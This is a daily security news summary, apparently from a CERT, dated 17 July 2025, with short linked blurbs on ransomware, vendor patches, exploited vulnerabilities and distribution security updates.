Tageszusammenfassung - 17.07.2025

End-of-Day report

Timeframe: Mittwoch 16-07-2025 18:00 - Donnerstag 17-07-2025 18:00 Handler: Alexander Riepl Co-Handler: n/a

News

KAWA4096-s Ransomware Tide: Rising Threat With Borrowed Styles

KAWA4096, a ransomware whose name includes "Kawa", the Japanese word for "river", first emerged in June 2025. This new threat features a leak site that follows the style of the Akira ransomware group, and a ransom note format similar to Qilin-s, likely an attempt to further enrich their visibility and credibility. In this blog ..

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/kawa4096s-ransomware-tide-rising-threat-with-borrowed-styles/

Oracle: 309 Sicherheitsupdates für alle möglichen Produkte

Oracle hat zum Critical Patch Update genannten Patchday im Juli 309 Sicherheitsupdates angekündigt. Zig Produkte sind verwundbar.

https://www.heise.de/news/Oracle-309-Sicherheitsupdates-fuer-alle-moeglichen-Produkte-10490492.html

Cisco: Sicherheitslücken in mehreren Produkten

In Ciscos ISE klafft eine weitere Lücke mit maximalem Bedrohungsgrad. Zudem warnt Cisco vor weiteren Lücken in mehr Produkten.

https://www.heise.de/news/Weitere-kritische-Luecke-in-Ciscos-ISE-10490589.html

Trump gibt eine Milliarde Dollar für offensive Cyberoperationen frei

Wie genau das Geld eingesetzt werden soll, ist nicht bekannt. Der Blick dürfte sich aber vor allem nach China richten

https://www.derstandard.at/story/3000000279549/trump-gibt-eine-milliarde-dollar-fuer-offensive-cyberoperationen-frei

Google spots tailored backdoor malware aimed at SonicWall appliances

Google researchers reported on a malware campaign against end-of-life SonicWall appliances, noting that the attackers were good at covering their tracks.

https://therecord.media/sonicwall-sma-100-series-overstep-malware-unc6148

Detection Engineering: Practicing Detection-as-Code - Repository - Part 2

This is the second part of the Practicing Detection-as-Code series, where we will cover some basic elements of designing a repository to develop, store, and deploy detections from. Well go through several different aspects of the setup like the Git platform, branch strategy, repository structure, detections structure, taxonomies, and content packs.

https://blog.nviso.eu/2025/07/17/detection-engineering-practicing-detection-as-code-repository-part-2/

Exploitation of CitrixBleed 2 (CVE-2025-5777) Began Before PoC Was Public

GreyNoise has observed active exploitation attempts against CVE-2025-5777 (CitrixBleed 2), a memory overread vulnerability in Citrix NetScaler. Exploitation began on June 23 - nearly two weeks before a public proof-of-concept was released on July 4.

https://www.greynoise.io/blog/exploitation-citrixbleed-2-cve-2025-5777-before-public-poc

Flaw in Signal App Clone Could Leak Passwords - GreyNoise Identifies Active Reconnaissance and Exploit Attempts

A vulnerability disclosed in May 2025, CVE-2025-48927, affects certain deployments of TeleMessageTM SGNL. If exposed, this endpoint can return a full snapshot of heap memory which may include plaintext usernames, passwords, and other sensitive data.

https://www.greynoise.io/blog/active-exploit-attempts-signal-based-messaging-app

How to catch GitHub Actions workflow injections before attackers do

Strengthen your repositories against actions workflow injections - one of the most common vulnerabilities.

https://github.blog/security/vulnerability-research/how-to-catch-github-actions-workflow-injections-before-attackers-do/

Vulnerabilities

Security updates for Thursday

Security updates have been issued by AlmaLinux (emacs, java-17-openjdk, kernel, kernel-rt, microcode_ctl, python3.11-setuptools, python3.12-setuptools, and socat), Debian (gnutls28), Fedora (vim), Red Hat (java-1.8.0-ibm), Slackware (bind), SUSE (docker, erlang, erlang26, ggml-devel-5889, gnuplot, kernel, kubernetes1.27, libQt6Concurrent6, mailman3, and transfig), and Ubuntu (apache2, bind9, linux-iot, linux-lowlatency-hwe-6.11, and linux-raspi, linux-raspi-5.4).

https://lwn.net/Articles/1030256/